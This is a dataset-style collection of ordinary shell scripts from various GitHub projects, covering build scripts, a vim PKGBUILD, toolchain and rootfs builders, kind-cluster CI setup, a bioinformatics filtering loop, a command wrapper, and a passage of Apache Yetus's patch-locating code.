855fa1613c3c8d5d7f143a3601d4c2169ed4544e | Shell | nayuta-ueno/lns_test_mqtt | /rrt_cln_mqtt.sh | UTF-8 | 187 | 2.703125 | 3 | [] | no_license | #!/bin/sh
set -eu
TESTNAME=$1
if [ $# -eq 2 ]; then
PORT=$2
ADDR=127.0.0.1
else
PORT=$2
ADDR=$3
fi
python3 mqtt_responser.py ${TESTNAME} clightning ${ADDR} ${PORT} /tmp/light${PORT}
| true |
16ae6c0e56c69dc50b4ce75c8867fd63d661d6de | Shell | fomalhaut88/pi-gpio-server | /backend/build.sh | UTF-8 | 207 | 2.53125 | 3 | [] | no_license | #!/bin/bash
PYTHON_INTERPRETER=python3
if [ ! -d .venv ]; then
$PYTHON_INTERPRETER -m pip install virtualenv
$PYTHON_INTERPRETER -m virtualenv .venv
fi
./.venv/bin/pip install -r requirements.txt
| true |
8f56564a0983b490ac8c24df168ebbcf416d5747 | Shell | mkaczanowski/pkgbuilds | /vim-git/PKGBUILD | UTF-8 | 2,453 | 2.75 | 3 | [] | no_license | # Maintainer: Egor Kovetskiy <e.kovetskiy@office.ngs.ru>
# Maintainer: Mateusz Kaczanowski <kaczanowski.mateusz@gmail.com>
pkgbase='vim-git'
pkgname=('vim-git' 'vim-git-runtime')
pkgver=10985.5e5a98d7d
pkgrel=1
pkgdesc="VIM: Vi IMproved"
arch=('i686' 'x86_64')
url="http://github.com/vim/vim"
license=('GPL')
depends=('gpm' 'ruby' 'lua' 'python2' 'python' 'acl')
optdepends=()
backup=()
options=()
source=("git://github.com/vim/vim.git")
md5sums=('SKIP')
pkgver() {
cd "vim"
echo $(git rev-list --count master).$(git rev-parse --short master)
}
build() {
cd "$srcdir/vim"
sed -i 's|^.*\(#define SYS_.*VIMRC_FILE.*"\) .*$|\1|' src/feature.h
sed -i 's|^.*\(#define VIMRC_FILE.*"\) .*$|\1|' src/feature.h
(cd src && autoconf)
# with-x=yes provides FEAT_XCLIPBOARD which provides FEAT_CLIENTSERVER
./configure \
--prefix=/usr \
--localstatedir=/var/lib/vim \
--with-features=huge \
--with-compiledby='Arch Linux' \
--enable-gpm \
--enable-acl \
--with-x=yes \
--disable-gui \
--enable-multibyte \
--enable-cscope \
--enable-netbeans \
--enable-perlinterp \
--enable-pythoninterp \
--disable-python3interp \
--enable-rubyinterp \
--enable-luainterp
make
}
package_vim-git-runtime() {
provides=('vim-runtime')
conflicts=('vim-runtime')
pkgdesc+=' (shared runtime)'
optdepends=('sh: support for some tools and macros'
'python: demoserver example tool'
'gawk: mve tools upport')
backup=('etc/vimrc')
cd "$srcdir/vim"
make -j1 VIMRCLOC=/etc DESTDIR="${pkgdir}" install
# man and bin files belong to 'vim'
rm -r "${pkgdir}"/usr/share/man/ "${pkgdir}"/usr/bin/
# no desktop files and icons
rm -r "${pkgdir}"/usr/share/{applications,icons}
# license
install -dm 755 "${pkgdir}"/usr/share/licenses/vim-runtime
ln -s /usr/share/vim/vim${_versiondir}/doc/uganda.txt \
"${pkgdir}"/usr/share/licenses/vim-runtime/license.txt
}
package_vim-git() {
provides=('vim')
conflicts=('vim')
cd "$srcdir/vim"
make -j1 VIMRCLOC=/etc DESTDIR="${pkgdir}" install
rm "${pkgdir}"/usr/bin/{ex,view}
find "${pkgdir}"/usr/share/man -type d -name 'man1' 2>/dev/null | \
while read _mandir; do
cd ${_mandir}
rm -f ex.1 view.1
rm -f evim.1
done
rm -r "${pkgdir}"/usr/share/vim
install -Dm644 runtime/doc/uganda.txt \
"${pkgdir}"/usr/share/licenses/${pkgname}/license.txt
}
| true |
84ef0840faeb9b48d2fcf8df5384c685471f4aac | Shell | dariost/logisim-or1k-cpu | /util/toolchain.sh | UTF-8 | 1,220 | 2.625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
mkdir -p /tmp/or1k
mkdir -p "$HOME""/or1k/bin"
pushd /tmp/or1k
wget "http://ftp.gnu.org/gnu/binutils/binutils-2.25.1.tar.bz2"
wget "ftp://sourceware.org/pub/newlib/newlib-2.3.0.20160104.tar.gz"
git clone "https://github.com/openrisc/or1k-gcc.git"
export PREFIX="$HOME""/or1k"
export PATH="$PATH:$PREFIX/bin"
tar xjvf "binutils-2.25.1.tar.bz2"
tar xzvf "newlib-2.3.0.20160104.tar.gz"
mkdir build-binutils
cd build-binutils
../binutils-2.25.1/configure --target=or1k-elf --prefix=$PREFIX --enable-shared \
--disable-itcl --disable-tk --disable-tcl --disable-winsup --disable-gdbtk \
--disable-libgui --disable-rda --disable-sid --disable-sim --with-sysroot
make -j4
make install
cd ..
mkdir build-gcc-stage1
cd build-gcc-stage1
../or1k-gcc/configure --target=or1k-elf --prefix=$PREFIX --enable-languages=c --disable-shared --disable-libssp
make -j4
make install
cd ..
mkdir build-newlib
cd build-newlib
../newlib-2.3.0.20160104/configure --target=or1k-elf --prefix=$PREFIX
make -j4
make install
cd ..
mkdir build-gcc-stage2
cd build-gcc-stage2
../or1k-gcc/configure --target=or1k-elf --prefix=$PREFIX --enable-languages=c,c++ --disable-shared --disable-libssp --with-newlib
make -j4
make install
cd ..
popd
| true |
a37621989ce340e377a8281ded41f08e70057564 | Shell | IPv4v6/dockerfiles | /debian/squeeze/20140101/buildfs.sh | UTF-8 | 448 | 3 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
set -u
DIST=squeeze
DATE=20140101
BUILDROOT=~/BUILDROOT
TARGET=${BUILDROOT}/${DIST}-${DATE}
MIRROR=http://snapshot.debian.org/archive/debian/20140101T042327Z/
mkdir -p ${TARGET}
debootstrap --verbose --variant=minbase ${DIST} ${TARGET} ${MIRROR}
echo "${DIST}" > ${TARGET}/etc/hostname
rm -rf ${TARGET}/var/cache/apt/archives
rm -rf ${TARGET}/var/lib/apt/lists
tar -cJvf ./rootfs-${DIST}-${DATE}.tar.xz -C ${TARGET} .
| true |
92bbbee05c70c370276fd7f72ee19fb997ba5982 | Shell | keplerlab/idea2life | /ai/data/scripts/get_classes.sh | UTF-8 | 237 | 3.15625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
if [[ $# -eq 0 ]] ; then
echo 'Provide AILab JSON file name.'
exit 0
fi
cat $1 | grep "tagName" | cut -d ":" -f 2 | tr -d '", ' | sort | uniq > predefined_classes.txt
echo 'Lables saved in: predefined_classes.txt'
| true |
2523f7a4768620d7daa69fcd299a28ae4bc03450 | Shell | svenXY/pyenv-virtualenv-migrate | /bin/pyenv-virtualenv-migrate | UTF-8 | 2,498 | 4.28125 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
#
# Summary: Migrate all virtualenvs from a Python version to another
#
# Usage: pyenv virtualenv-migrate [-d|-h] <from> <to>
#
# -d Attempt to remove the old virtualenv after migration.
# User would be prompted for confirmation.
# -f Do not prompt at any step
# -h Display help
#
set -e
[ -n "$PYENV_DEBUG" ] && set -x
# Provide pyenv completions
if [ "$1" = "--complete" ]; then
exec pyenv-versions --bare
fi
if [ -z "$PYENV_ROOT" ]; then
PYENV_ROOT="${HOME}/.pyenv"
fi
usage() {
pyenv-help virtualenv-migrate [venv name regex] 2>/dev/null
[ -z "$1" ] || exit "$1"
}
migration_failed() {
{ echo
echo "VIRTUALENV MIGRATION FAILED"
echo
echo "Inspect or clean up the virtualenv: ${VENV_NAME}"
echo " old: ${VENV_SRC}"
echo " new: ${VENV_DST}"
} 1>&2
exit 1
}
# Parse arguments
unset DELETE
unset FORCE
while getopts "dfh" arg; do
case $arg in
d) DELETE=true;;
f) FORCE="-f";;
h) usage 1
esac
done
src="${@:$OPTIND:1}"
dst="${@:$OPTIND+1:1}"
regex="${@:$OPTIND+2:1}"
shift $((OPTIND-1))
if [ -n "$regex" ]; then
GREP_CMD="| grep -e $regex"
fi
shift $((OPTIND-1))
[ -n "$src" ] || usage 1
[ -n "$dst" ] || usage 1
pyenv-prefix "$src" 1>/dev/null 2>&1 || {
echo "pyenv: not an installed version: $src" 1>&2
usage 1
}
pyenv-prefix "$dst" 1>/dev/null 2>&1 || {
echo "pyenv: not an installed version: $dst" 1>&2
usage 1
}
VENVS=$(pyenv virtualenvs --skip-aliases | awk "/$src/{print \$1}" $GREP_CMD)
if [ -z "$VENVS" ]; then
echo "pyenv: no virtualenvs to migrate from python version: $src" 1>&2
usage 1
fi
if [ -z "$TMPDIR" ]; then
TMP="/tmp"
else
TMP="${TMPDIR%/}"
fi
SEED="$(date "+%Y%m%d%H%M%S").$$"
LOG_PATH="${TMP}/python-build.${SEED}.log"
trap migration_failed ERR
for VENV_SRC in $VENVS
do
VENV_NAME=$(printf "%s" "${VENV_SRC}" | awk -F'/' '{print $3}' || exit 1)
VENV_DST=$(printf "%s" "${VENV_SRC}" | sed "s|${src}|${dst}|" || exit 1)
# Rename symlink to avoid clash while recreating virtualenv with the same name
VENV_SYMLINK="${PYENV_ROOT}/versions/${VENV_NAME}"
if [ -L "${VENV_SYMLINK}" ]; then
mv -f "${PYENV_ROOT}/versions/${VENV_NAME}" "${PYENV_ROOT}/versions/_${VENV_NAME}_${src}"
fi
printf "%s\n" "Migrating: ${VENV_SRC} -> ${VENV_DST}"
pyenv virtualenv $FORCE "${dst}" "${VENV_DST}"
pyenv migrate "${VENV_SRC}" "${VENV_DST}"
[ -n "$DELETE" ] && pyenv virtualenv-delete $FORCE "${VENV_SRC}" 1>/dev/null
done
pyenv-rehash
trap - ERR
| true |
2e9be3ad63482792dd928e6b752e323e334d5f9e | Shell | hughesyang/backup | /myscript/daily_build_bcm.sh | UTF-8 | 342 | 2.9375 | 3 | [] | no_license | #!/bin/bash
# The script build bcm sdk.
# ----------------------------------------------------------------------------------
# SDK root path
BCM_SDK_BLD_PATH=/home/hughes/f8/aos/bcm/sdk/sdk-build
if [ ! -d ${BCM_SDK_BLD_PATH} ]; then
echo "BCM SDK build dir not exist!"
exit 1
fi
cd ${BCM_SDK_BLD_PATH}
./build_sdk.sh -a x86
exit 0
| true |
b3b3716c0949246570f34018078b2e307116d0c1 | Shell | kubermatic/kubermatic | /hack/ci/setup-kind-cluster.sh | UTF-8 | 6,806 | 3.28125 | 3 | [
"LicenseRef-scancode-dco-1.1",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | # Copyright 2020 The Kubermatic Kubernetes Platform contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
source hack/lib.sh
echodate "Setting up kind cluster..."
if [ -z "${JOB_NAME:-}" ] || [ -z "${PROW_JOB_ID:-}" ]; then
echodate "This script should only be running in a CI environment."
exit 1
fi
export KIND_CLUSTER_NAME="${KIND_CLUSTER_NAME:-kubermatic}"
export KUBERMATIC_EDITION="${KUBERMATIC_EDITION:-ce}"
WITH_WORKERS="${WITH_WORKERS:-}"
WORKERS=''
start_docker_daemon_ci
# Create kind cluster
TEST_NAME="Create kind cluster"
echodate "Preloading the kindest/node image"
docker load --input /kindest.tar
echodate "Creating the kind cluster"
export KUBECONFIG=~/.kube/config
beforeKindCreate=$(nowms)
# If a Docker mirror is available, we tunnel it into the
# kind cluster, which has its own containerd daemon.
# kind current does not allow accessing ports on the host
# from within the cluster and also does not allow adding
# custom flags to the `docker run` call it does in the
# background.
# To circumvent this, we use socat to make the TCP-based
# mirror available as a local socket and then mount this
# into the kind container.
# Since containerd does not support sockets, we also start
# a second socat process in the kind container that unwraps
# the socket again and listens on 127.0.0.1:5001, which is
# then used for containerd.
# Being a docker registry does not incur a lot of requests,
# just a few big ones. For this socat seems pretty reliable.
if [ -n "${DOCKER_REGISTRY_MIRROR_ADDR:-}" ]; then
mirrorHost="$(echo "$DOCKER_REGISTRY_MIRROR_ADDR" | sed 's#http://##' | sed 's#/+$##g')"
# make the registry mirror available as a socket,
# so we can mount it into the kind cluster
mkdir -p /mirror
socat UNIX-LISTEN:/mirror/mirror.sock,fork,reuseaddr,unlink-early,mode=777 TCP4:$mirrorHost &
function end_socat_process {
echodate "Killing socat docker registry mirror processes..."
pkill -e socat
}
appendTrap end_socat_process EXIT
if [ -n "${WITH_WORKERS}" ]; then
WORKERS=' - role: worker
# mount the socket
extraMounts:
- hostPath: /mirror
containerPath: /mirror
- role: worker
# mount the socket
extraMounts:
- hostPath: /mirror
containerPath: /mirror
'
fi
cat << EOF > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: "${KIND_CLUSTER_NAME}"
nodes:
- role: control-plane
# mount the socket
extraMounts:
- hostPath: /mirror
containerPath: /mirror
${WORKERS}
containerdConfigPatches:
# point to the soon-to-start local socat process
- |-
[plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"]
endpoint = ["http://127.0.0.1:5001"]
EOF
kind create cluster --config kind-config.yaml
pushElapsed kind_cluster_create_duration_milliseconds $beforeKindCreate
# unwrap the socket inside the kind cluster and make it available on a TCP port,
# because containerd/Docker doesn't support sockets for mirrors.
docker exec "$KIND_CLUSTER_NAME-control-plane" bash -c 'apt update --quiet; apt install --quiet socat; socat TCP4-LISTEN:5001,fork,reuseaddr UNIX:/mirror/mirror.sock &'
else
if [ -n "${WITH_WORKERS}" ]; then
WORKERS=' - role: worker
- role: worker'
fi
cat << EOF > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: "${KIND_CLUSTER_NAME}"
nodes:
- role: control-plane
${WORKERS}
EOF
kind create cluster --config kind-config.yaml
fi
# This is required if the kindest version matches the user cluster version.
# The kindest image comes with preloaded control plane images, however,
# the preloaded kube-controller-manager image doesn't have cloud providers
# built-in. This is done intentionally in order to reduce the kindest image
# size because kind is used only for local clusters.
# When the kindest version matches the user cluster version, KKP will use the
# preloaded kube-controller-manager image instead of pulling the image from
# k8s.gcr.io. This will cause the kube-controller-manager to crashloop because
# there are no cloud providers in that preloaded image.
# As a solution, we remove the preloaded image after starting the kind
# cluster, which will force KKP to pull the correct image.
docker exec "kubermatic-control-plane" bash -c "crictl images | grep kube-controller-manager | awk '{print \$2}' | xargs -I{} crictl rmi registry.k8s.io/kube-controller-manager:{}" || true
if [ -z "${DISABLE_CLUSTER_EXPOSER:-}" ]; then
# Start cluster exposer, which will expose services from within kind as
# a NodePort service on the host
echodate "Starting cluster exposer"
CGO_ENABLED=0 go build --tags "$KUBERMATIC_EDITION" -v -o /tmp/clusterexposer ./pkg/test/clusterexposer/cmd
/tmp/clusterexposer \
--kubeconfig-inner "$KUBECONFIG" \
--kubeconfig-outer "/etc/kubeconfig/kubeconfig" \
--build-id "$PROW_JOB_ID" &> /var/log/clusterexposer.log &
function print_cluster_exposer_logs {
if [[ $? -ne 0 ]]; then
# Tolerate errors and just continue
set +e
echodate "Printing cluster exposer logs"
cat /var/log/clusterexposer.log
echodate "Done printing cluster exposer logs"
set -e
fi
}
appendTrap print_cluster_exposer_logs EXIT
TEST_NAME="Wait for cluster exposer"
echodate "Waiting for cluster exposer to be running"
retry 5 curl -s --fail http://127.0.0.1:2047/metrics -o /dev/null
echodate "Cluster exposer is running"
echodate "Setting up iptables rules for to make nodeports available"
KIND_NETWORK_IF=$(ip -br addr | grep -- 'br-' | cut -d' ' -f1)
KIND_CONTAINER_IP=$(docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $KIND_CLUSTER_NAME-control-plane)
iptables -t nat -A PREROUTING -i eth0 -p tcp -m multiport --dports=30000:33000 -j DNAT --to-destination $KIND_CONTAINER_IP
# By default all traffic gets dropped unless specified (tested with docker server 18.09.1)
iptables -t filter -I DOCKER-USER -d $KIND_CONTAINER_IP/32 ! -i $KIND_NETWORK_IF -o $KIND_NETWORK_IF -p tcp -m multiport --dports=30000:33000 -j ACCEPT
# Docker sets up a MASQUERADE rule for postrouting, so nothing to do for us
echodate "Successfully set up iptables rules for nodeports"
fi
echodate "Kind cluster $KIND_CLUSTER_NAME is up and running."
| true |
646ba0e503ecc79251a32db8e4c7b369f4e496ff | Shell | microgenomics/MAGnifico | /data_filtering.sh | UTF-8 | 1,456 | 3.109375 | 3 | [] | no_license | #!/bin/bash
#---define samples
samples="G1-1 G1-2 G1-3 G2-1 G2-2 G2-3"
#---define directories
cleaneddir="/datos/fgutzwiller/cleaned_data/rhizosphere_2017/no_cut"
filtereddir="/datos/fgutzwiller/filtered_data/rhizosphere_2017/no_cut"
datadir="/datos/fgutzwiller/database"
for i in $samples
do
#map reads to plastid end to end mode and keep unmapped reads
bowtie2 -p 20 -x $datadir/plastid/plastid -1 $cleaneddir/${i}_1.fastq -2 $cleaneddir/${i}_2.fastq -U $cleaneddir/${i}_1_singletons.fastq,$cleaneddir/${i}_2_singletons.fastq --end-to-end --un-conc $filtereddir/${i}_tmp1 --un $filtereddir/${i}_singleton_tmp1
#map reads to mitochondria end to end mode and keep unmapped reads
bowtie2 -p 20 -x $datadir/mitochondria/mitochondrion -1 $filtereddir/${i}_tmp1.1 -2 $filtereddir/${i}_tmp1.2 -U $filtereddir/${i}_singleton_tmp1 --end-to-end --un-conc $filtereddir/${i}_tmp2 --un $filtereddir/${i}_singleton_tmp2
#map reads to plant genomes end to end mode and keep unmapped reads
bowtie2 -p 20 -x $datadir/plants/plants_all -1 $filtereddir/${i}_tmp2.1 -2 $filtereddir/${i}_tmp2.2 -U $filtereddir/${i}_singleton_tmp2 --end-to-end --un-conc $filtereddir/${i}_filtered --un $filtereddir/${i}_singleton_filtered
#rename output files
mv $filtereddir/${i}_filtered.1 $filtereddir/${i}_filtered_1.fastq
mv $filtereddir/${i}_filtered.2 $filtereddir/${i}_filtered_2.fastq
mv $filtereddir/${i}_singleton_filtered $filtereddir/${i}_singleton_filtered.fastq
done
| true |
ada28bd1ba65eaec30310e83773db606f52be549 | Shell | casperklein/bash-pack | /exe | UTF-8 | 3,690 | 4.25 | 4 | [] | no_license | #!/bin/bash
set -ueo pipefail
# whats my name?
APP=${0##*/}
# Uncomment to enable command logging to file
#LOG="/tmp/$APP.history"
# force color?
[ "${1:-}" == "--color" ] && COLOR=1 && shift || COLOR=0
# no tty? no colors!
tty -s || [ "$COLOR" -eq 1 ] && RED=$'\e[0;31m' || RED=
tty -s || [ "$COLOR" -eq 1 ] && GREEN=$'\e[0;32m' || GREEN=
tty -s || [ "$COLOR" -eq 1 ] && YELLOW=$'\e[0;33m' || YELLOW=
tty -s || [ "$COLOR" -eq 1 ] && RESET=$'\e[0m' || RESET= # reset fg/bg color
tty -s || [ "$COLOR" -eq 1 ] && DELETE=$'\r\033[K' || DELETE=$'\n' # delete current line
_exe() {
local i CMD CODE COUNT ERROR RESULT SPACE
# multiple arguments? try to escape if necessary
if [ $# -gt 1 ]; then
# Legacy (multiple arguments; kept for compatibility)
for i in "$@"; do
# escape bash operators & build-ins
if [[ "$i" =~ ^[0-9\<\>\|\&\*\;]+$|^time$ ]]; then
CMD+=" $i"
else
# since we use ' ourself, we need to escape it
#i=$(echo "$i" | sed 's/'\''/'\''\\'\'\''/g') # use printf, to avoid problems with echo options in $i, e.g. -n
# shellcheck disable=SC1003
i=$(printf "%s\n" "$i" | sed 's/'\''/'\''\\'\'\''/g')
CMD+=' '\'"$i"\'
fi
done
CMD=${CMD:1}
else
CMD=$1
fi
# logging
if [ -n "${LOG:-}" ]; then
printf "%s\t%s\n" "$(date '+%F %T')" "$CMD" >> "$LOG"
fi
# in progress
printf "%s" "[ $YELLOW..$RESET ] $YELLOW>>$RESET $CMD"
if RESULT=$(bash -c "$CMD" 2>&1); then
# success; is there output?
[ -n "$RESULT" ] && {
# more than one line output?
if [[ "$RESULT" == *$'\n'* ]]; then
COUNT=$(( ${#CMD} + 14 ))
SPACE=$(printf "%${COUNT}s")
RESULT=$(echo -n "$RESULT" | sed "s/^/$SPACE/g")
RESULT=${RESULT:$COUNT}
fi
RESULT=" $YELLOW>>$RESET $GREEN$RESULT$RESET"
}
echo -n "$DELETE"
printf "%s\n" "[$GREEN OK $RESET] $YELLOW>>$RESET $CMD$RESULT"
exit 0
else
# errocode > 0
CODE=$?
# is there output?
[ -n "$RESULT" ] && {
# more than one line output?
if [[ "$RESULT" == *$'\n'* ]]; then
COUNT=$(( ${#CMD} + 17 ))
SPACE=$(printf "%${COUNT}s")
RESULT=$(echo -n "$RESULT" | sed "s/^/$SPACE/g")
RESULT=${RESULT:$COUNT}
fi
RESULT=" $YELLOW>>$RESET $RED$RESULT$RESET"
}
echo -n "$DELETE"
printf "%s\n" "[$RED ERROR $RESET] $YELLOW>>$RESET $CMD$RESULT"
exit "$CODE"
fi
}
_line() {
echo
printf '%.0s-' $(seq 1 ${COLUMNS:-80})
echo
echo
}
_usage() {
local DEMO ERROR
echo "Executes a command and show result/output in a nice way. Original return code is preserved."
echo
echo "Usage: $APP [--color] <command>"
echo
echo " --color force color usage"
echo " <command> command to execute"
echo
_line
# shellcheck disable=SC2140
echo "Example: $YELLOW$APP "\""echo 'hello world'\"$RESET"
echo
DEMO=$("$APP" "echo 'hello world'")
ERROR=$?
echo "Result:"
echo
echo "$DEMO"
echo "Return code: $GREEN$ERROR$RESET"
_line
# shellcheck disable=SC2140
echo "Example with error: $YELLOW$APP "\""echo 'hello world'; false\"$RESET"
echo
set +e
DEMO=$("$APP" "echo 'hello world'; false")
ERROR=$?
set -e
echo "Result:"
echo
echo "$DEMO"
echo "Return code: $RED$ERROR$RESET"
_line
echo "Example with pipe: $YELLOW$APP 'echo foo | cat'$RESET"
echo
DEMO=$("$APP" 'echo foo | cat')
ERROR=$?
echo "Result:"
echo
echo "$DEMO"
echo "Return code: $GREEN$ERROR$RESET"
_line
echo "(Deprecated) Example with multible arguments and escaped pipe: $YELLOW$APP echo foo '|' cat$RESET"
echo
DEMO=$("$APP" echo foo '|' cat)
ERROR=$?
echo "Result:"
echo
echo "$DEMO"
echo "Return code: $GREEN$ERROR$RESET"
echo
exit 1
} >&2
# no arguments? show usage
[ $# -lt 1 ] && _usage
_exe "$@"
| true |
9b66818d7b4f409f22c378f5b0114aa1097cac2a | Shell | zhuomanliu/SCGN | /test.sh | UTF-8 | 249 | 2.78125 | 3 | [
"BSD-3-Clause"
] | permissive | #!/usr/bin/env bash
#1 gpu id , #2 dataset, #3 model name, #4 output folder name
echo "[GPU: " $1 "] Testing on " $2 " dataset"
CUDA_VISIBLE_DEVICES=$1 python main.py --mode='test' --dataset=$2 --model=$3 --output_folder=$4
echo "Testing done." | true |
85f9dcf64036d20093b5bfb513f862dfcb21d0f1 | Shell | apache/yetus | /precommit/src/main/shell/core.d/patchfiles.sh | UTF-8 | 11,525 | 3.421875 | 3 | [
"MIT",
"OFL-1.1",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/usr/bin/env bash
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Global state shared with the rest of the precommit framework.
# SC2034 is disabled on the INPUT_* variables because they are written
# here (and by locate_patch below) but consumed by other sourced modules.

# path to the patch-format copy of the change under test (see locate_patch)
#shellcheck disable=SC2034
INPUT_PATCH_FILE=""
# path to the diff-format copy of the change, for degraded modes (see locate_patch)
#shellcheck disable=SC2034
INPUT_DIFF_FILE=""
# which of the above files actually got applied -- presumably set by the
# apply logic elsewhere; not written in this chunk
#shellcheck disable=SC2034
INPUT_APPLIED_FILE=""
# how the input was applied -- presumably set by the apply logic elsewhere
#shellcheck disable=SC2034
INPUT_APPLY_TYPE=""
# apply method actually in use; empty means "not yet determined"
PATCH_METHOD=""
# ordered list of apply methods to try
PATCH_METHODS=("gitapply" "patchcmd")
# strip level for the patch tool (cf. patch -p) -- TODO confirm against apply code
PATCH_LEVEL=0
# hint about which tool should process the patch (e.g. "git");
# set by patch_file_hinter below
PATCH_HINT=""
## @description  Last-resort patch fetcher: download the patch with curl.
## @audience     private
## @stability    evolving
## @param        patchloc
## @param        output
## @return       0 got something
## @return       1 error
function generic_locate_patch
{
  declare remoteloc=$1
  declare destfile=$2

  # never touch the network in offline mode
  if [[ "${OFFLINE}" == true ]]; then
    yetus_debug "generic_locate_patch: offline, skipping"
    return 1
  fi

  # -L: follow redirects, since issue trackers usually redirect to attachments
  ${CURL} --silent -L \
    --output "${destfile}" \
    "${remoteloc}" && return 0

  yetus_debug "generic_locate_patch: failed to download the patch."
  return 1
}
## @description  Given a possible patch file, guess if it's a patch file
## @description  only using the more intense verify if we really need to
## @audience     private
## @stability    evolving
## @param        path to patch file to test
## @return       0 we think it's a patch file
## @return       1 we think it's not a patch file
function guess_patch_file
{
  declare patch=$1
  declare fileOutput

  # a missing file can never be a patch
  if [[ ! -f ${patch} ]]; then
    return 1
  fi

  yetus_debug "Trying to guess if ${patch} is a patch file."

  # cheap check #1: file(1) magic recognizes it as a diff
  fileOutput=$("${FILE}" "${patch}")
  if [[ $fileOutput =~ \ diff\ ]]; then
    yetus_debug "file magic says it's a diff."
    return 0
  fi

  # cheap check #2: first line looks like git format-patch mbox output,
  # a unified diff, or an svn-style Index: header.
  # Test the pipeline directly instead of capturing unused output and
  # then checking $? (the SC2181 anti-pattern the original suppressed).
  if head -n 1 "${patch}" | "${GREP}" -q -E "^(From [a-z0-9]* Mon Sep 17 00:00:00 2001)|(diff .*)|(Index: .*)$"; then
    yetus_debug "first line looks like a patch file."
    return 0
  fi

  # expensive check: let the configured patch method(s) dry-run it
  patchfile_dryrun_driver "${patch}"
}
## @description  Provide a hint on what tool should be used to process a patch file
## @description  Sets PATCH_HINT to provide the hint.  Will not do anything if
## @description  PATCH_HINT or PATCH_METHOD is already set
## @audience private
## @stability evolving
## @replaceable no
## @param path to patch file to test
function patch_file_hinter
{
  declare pfile=$1

  if [[ -z "${pfile}" ]]; then
    generate_stack
  fi

  # Respect a hint or method that has already been decided.
  if [[ -n "${PATCH_HINT}" || -n "${PATCH_METHOD}" ]]; then
    return
  fi

  # A git format-patch file starts with a fake mbox "From" line and carries
  # From:/Subject: [PATCH]/--- markers; require all of them before hinting.
  if ! head -n 1 "${pfile}" | "${GREP}" -q -E "^From [a-z0-9]* Mon Sep 17 00:00:00 2001"; then
    return
  fi
  if "${GREP}" -q "^From: " "${pfile}" \
      && "${GREP}" -q "^Subject: \[PATCH" "${pfile}" \
      && "${GREP}" -q "^---" "${pfile}"; then
    PATCH_HINT="git"
  fi
}
## @description  Given ${PATCH_OR_ISSUE}, determine what type of patch file is in use,
## @description  and do the necessary work to place it into ${INPUT_PATCH_FILE}.
## @description  If the system support diff files as well, put the diff version in
## @description  ${INPUT_DIFF_FILE} so that any supported degraded modes work.
## @audience private
## @stability evolving
## @replaceable no
## @return 0 on success
## @return 1 on failure, may exit
function locate_patch
{
  declare bugsys
  declare patchfile=""
  declare gotit=false

  yetus_debug "locate patch"

  # Nothing to do without a patch reference; bail out completely.
  if [[ -z "${PATCH_OR_ISSUE}" ]]; then
    yetus_error "ERROR: No patch provided."
    cleanup_and_exit 1
  fi

  INPUT_PATCH_FILE="${PATCH_DIR}/input.patch"
  INPUT_DIFF_FILE="${PATCH_DIR}/input.diff"

  echo "Processing: ${PATCH_OR_ISSUE}"

  # it's a locally provided file
  if [[ -f ${PATCH_OR_ISSUE} ]]; then
    patchfile="${PATCH_OR_ISSUE}"
    PATCH_SYSTEM=generic
    # Drop a stale copy in PATCH_DIR if it differs from the given file,
    # so the cp at the bottom refreshes it.
    if [[ -f "${INPUT_PATCH_FILE}" ]]; then
      if ! "${DIFF}" -q "${PATCH_OR_ISSUE}" "${INPUT_PATCH_FILE}" >/dev/null; then
        rm "${INPUT_PATCH_FILE}"
      fi
    fi
  else
    # run through the bug systems. maybe they know?
    for bugsys in "${BUGSYSTEMS[@]}"; do
      if declare -f "${bugsys}_locate_patch" >/dev/null 2>&1; then
        if "${bugsys}_locate_patch" \
          "${PATCH_OR_ISSUE}" \
          "${INPUT_PATCH_FILE}" \
          "${INPUT_DIFF_FILE}"; then
          gotit=true
          PATCH_SYSTEM=${bugsys}
        fi
      fi

      # did the bug system actually make us change our mind?
      # NOTE(review): this returns after the FIRST bug system when
      # BUILDMODE=full, regardless of whether it located anything --
      # confirm that is the intended short-circuit.
      if [[ "${BUILDMODE}" == full ]]; then
        return 0
      fi
    done

    # ok, none of the bug systems know. let's see how smart we are
    if [[ ${gotit} == false ]]; then
      if ! generic_locate_patch "${PATCH_OR_ISSUE}" "${INPUT_PATCH_FILE}"; then
        yetus_error "ERROR: Unsure how to process ${PATCH_OR_ISSUE}."
        cleanup_and_exit 1
      fi
      PATCH_SYSTEM=generic
    fi
  fi

  yetus_debug "Determined patch system to be ${PATCH_SYSTEM}"

  # For the local-file case, publish the patch into PATCH_DIR.
  if [[ ! -f "${INPUT_PATCH_FILE}"
      && -f "${patchfile}" ]]; then
    if cp "${patchfile}" "${INPUT_PATCH_FILE}"; then
      echo "Patch file ${patchfile} copied to ${PATCH_DIR}"
    else
      yetus_error "ERROR: Could not copy ${patchfile} to ${PATCH_DIR}"
      cleanup_and_exit 1
    fi
  fi
}
## @description  if patch-level zero, then verify we aren't
## @description  just adding files
## @audience public
## @stability stable
## @param log filename
## @replaceable no
